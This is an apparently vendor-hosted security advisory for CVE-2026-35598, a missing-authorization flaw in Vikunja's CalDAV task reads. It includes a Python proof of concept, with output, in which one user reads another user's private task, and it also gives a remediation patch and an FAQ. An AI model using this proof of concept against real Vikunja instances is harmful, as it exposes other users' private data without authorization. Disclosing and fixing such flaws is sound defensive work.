Summary
Vikunja Missing Authorization on CalDAV Task Read
Full technical description
The CalDAV GetResource and GetResourcesByList methods fetch tasks by UID from the database without verifying that the authenticated user has access to the task's project. Any authenticated CalDAV user who knows (or guesses) a task UID can read the full task data from any project on the instance.
Details
GetTasksByUIDs at pkg/models/tasks.go:376-393 performs a global database query with no authorization check:
func GetTasksByUIDs(s *xorm.Session, uids []string, a web.Auth) (tasks []*Task, err error) {
tasks = []*Task{}
err = s.In("uid", uids).Find(&tasks)
// ...
}
The web.Auth parameter is accepted but never used for permission filtering. This function is called by:
GetResourceatpkg/routes/caldav/listStorageProvider.go:266(CalDAV GET)GetResourcesByListatpkg/routes/caldav/listStorageProvider.go:199(CalDAV REPORT multiget)
All other CalDAV operations enforce authorization: CreateResource checks CanCreate(), UpdateResource checks CanUpdate(), DeleteResource checks CanDelete(). Only the read operations skip authorization.
The project ID in the CalDAV URL is ignored. A request to /dav/projects/{attacker_project}/{victim_task_uid}.ics returns the victim's task regardless of which project ID is in the path.
Proof of Concept
Tested on Vikunja v2.2.2.
import requests
from requests.auth import HTTPBasicAuth
TARGET = "http://localhost:3456"
API = f"{TARGET}/api/v1"
def login(u, p):
return requests.post(f"{API}/login", json={"username": u, "password": p}).json()["token"]
def h(token):
return {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
alice_token = login("alice", "Alice1234!")
bob_token = login("bob", "Bob12345!")
# alice creates private project and task
proj = requests.put(f"{API}/projects", headers=h(alice_token),
json={"title": "Private"}).json()
task = requests.put(f"{API}/projects/{proj['id']}/tasks", headers=h(alice_token),
json={"title": "Secret CEO salary 500k"}).json()
# task UID must be set (normally done by CalDAV sync; here via sqlite for PoC)
# sqlite3 vikunja.db "UPDATE tasks SET uid='test-uid-001' WHERE id={task['id']};"
TASK_UID = "test-uid-001"
# bob tries REST API
r = requests.get(f"{API}/tasks/{task['id']}", headers=h(bob_token))
print(f"REST API: {r.status_code}") # 403
# bob gets CalDAV token
caldav_token = requests.put(f"{API}/user/settings/token/caldav",
headers=h(bob_token)).json()["token"]
# bob reads alice's task via CalDAV (project ID in URL doesn't matter)
r = requests.get(f"{TARGET}/dav/projects/{proj['id']}/{TASK_UID}.ics",
auth=HTTPBasicAuth("bob", caldav_token))
print(f"CalDAV: {r.status_code}") # 200
print(r.text) # contains SUMMARY:Secret CEO salary 500k
Output:
REST API: 403
CalDAV: 200
BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VTODO
UID:test-uid-001
SUMMARY:Secret CEO salary 500k
DUE:20260401T000000Z
END:VTODO
END:VCALENDAR
The REST API correctly returns 403, but CalDAV leaks the full task. The project ID in the CalDAV URL is ignored - bob can also use his own project ID and still get alice's task.
Impact
An authenticated CalDAV user who obtains a task UID (from shared calendar URLs, client sync logs, or enumeration) can read the full task details from any project in the instance, regardless of their access rights. This includes titles, descriptions, due dates, priority, labels, and reminders. In multi-tenant deployments, this exposes data across organizational boundaries.
Task UIDs are UUIDv4 and not trivially enumerable, but they are exposed in CalDAV resource paths, client synchronization logs, and shared calendar contexts.
The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.
CVE-2026-35598 has a CVSS score of 4.3 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.3.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Add a CanRead permission check on each returned task's project in both GetResource and GetResourcesByList:
tasks, err := models.GetTasksByUIDs(s, []string{vcls.task.UID}, vcls.user)
// ...
for _, t := range tasks {
project := &models.Project{ID: t.ProjectID}
can, _, err := project.CanRead(s, vcls.user)
if err != nil || !can {
return nil, false, errs.ForbiddenError
}
}
Found and reported by aisafe.io
Frequently Asked Questions
- What is CVE-2026-35598? CVE-2026-35598 is a medium-severity missing authorization vulnerability in code.vikunja.io/api (go), affecting versions <= 2.2.2. It is fixed in 2.3.0. The application does not perform an authorization check before performing a sensitive operation.
- How severe is CVE-2026-35598? CVE-2026-35598 has a CVSS score of 4.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of code.vikunja.io/api are affected by CVE-2026-35598? code.vikunja.io/api (go) versions <= 2.2.2 is affected.
- Is there a fix for CVE-2026-35598? Yes. CVE-2026-35598 is fixed in 2.3.0. Upgrade to this version or later.
- Is CVE-2026-35598 exploitable, and should I be worried? Whether CVE-2026-35598 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-35598 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-35598? Upgrade
code.vikunja.io/apito 2.3.0 or later.